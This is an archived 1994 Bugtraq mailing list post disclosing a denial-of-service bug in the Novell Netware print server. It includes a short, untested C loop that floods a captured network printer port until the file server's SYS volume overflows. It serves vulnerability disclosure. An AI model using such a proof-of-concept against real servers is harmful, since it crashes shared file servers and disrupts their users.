Bugtraq mailing list archives

Novell Netware bug

From: Dan_Thorson () notes seagate com (Dan Thorson)
Date: Thu Aug 18 09:37:29 1994

I don't know if anybody cares about Novell Netware bugs in this list, but I
thought I'd post it just in case.

We've discovered (inadvertantly) a denial-of-service bug in the printserver
mechanism.  If an application attempts to print an extremely large file, the
SYS volume will overflow, and crash the file server.  I believe that the
following would do it, but I have not tried....

void main(void)
{
    while (1==1)
        printf("a");
}
compile and run this with the output redirected to LPTx: which has been
captured to a network printer.

If this msg doesn't belong on bugtrack, please don't flame me, just ignore it,
OK?

dct

#include <std_disclaimer.h>
--
Dan Thorson -- Dan_Thorson () notes seagate com
Seagate Technology   -   920 Disc Drive   -   Scotts Valley, CA 95066 USA

### OGATE Version 8 message trace and attachment information:
### MsgFileName: m:\mgate\outbound\132.MSG
### Org Date:    08-18-94 09:26:29 AM
### From:        Dan Thorson@SEAGATE
### To:          bugtraq @ crimelab.com @ internet
### Subject:     Novell Netware bug